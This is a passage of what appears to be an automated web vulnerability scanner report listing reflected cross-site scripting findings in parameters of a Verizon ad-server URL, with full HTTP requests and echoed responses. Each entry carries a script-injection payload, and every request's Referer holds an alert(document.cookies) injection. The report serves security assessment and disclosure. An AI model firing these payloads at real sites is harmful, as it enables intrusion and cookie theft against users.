GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=1674e"><script>alert(1)</script>44173c41208&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:06:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=1674e"><script>alert(1)</script>44173c41208&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.482. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [smb_enh_msg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the smb_enh_msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84478"><script>alert(1)</script>471bb037353 was submitted in the smb_enh_msg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=84478"><script>alert(1)</script>471bb037353&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:06:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
zm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=84478"><script>alert(1)</script>471bb037353&webex=&search=" target="_top">
...[SNIP]...

2.483. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [smb_premmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the smb_premmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25727"><script>alert(1)</script>9fae588ef85 was submitted in the smb_premmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=25727"><script>alert(1)</script>9fae588ef85&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:05:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=25727"><script>alert(1)</script>9fae588ef85&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.484. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [usertype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the usertype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd961"><script>alert(1)</script>a9b6fa28790 was submitted in the usertype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=fd961"><script>alert(1)</script>a9b6fa28790&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:01:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
8_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=fd961"><script>alert(1)</script>a9b6fa28790&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&searc
...[SNIP]...

2.485. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vasonly parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the vasonly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c563a"><script>alert(1)</script>1d46a499392 was submitted in the vasonly parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=c563a"><script>alert(1)</script>1d46a499392&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:02:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
acking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=c563a"><script>alert(1)</script>1d46a499392&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.486. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vec parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the vec request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d70cc"><script>alert(1)</script>e5d42cd79f2 was submitted in the vec parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=d70cc"><script>alert(1)</script>e5d42cd79f2&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:04:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=d70cc"><script>alert(1)</script>e5d42cd79f2&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.487. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vgodfamily parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the vgodfamily request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8767"><script>alert(1)</script>e3742717b85 was submitted in the vgodfamily parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=a8767"><script>alert(1)</script>e3742717b85&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:03:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3b45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
5?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=a8767"><script>alert(1)</script>e3742717b85&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.488. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vgodunlim parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the vgodunlim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52c29"><script>alert(1)</script>a976d9d415d was submitted in the vgodunlim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=52c29"><script>alert(1)</script>a976d9d415d&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:04:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3b45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=52c29"><script>alert(1)</script>a976d9d415d&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.489. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [viss parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the viss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6783"><script>alert(1)</script>4a9e40dc273 was submitted in the viss parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=f6783"><script>alert(1)</script>4a9e40dc273&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:03:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
5494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=f6783"><script>alert(1)</script>4a9e40dc273&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.490. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vsbb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the vsbb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d99e0"><script>alert(1)</script>96a7312a11e was submitted in the vsbb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=d99e0"><script>alert(1)</script>96a7312a11e&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:04:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3b45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=d99e0"><script>alert(1)</script>96a7312a11e&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.491. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [webex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
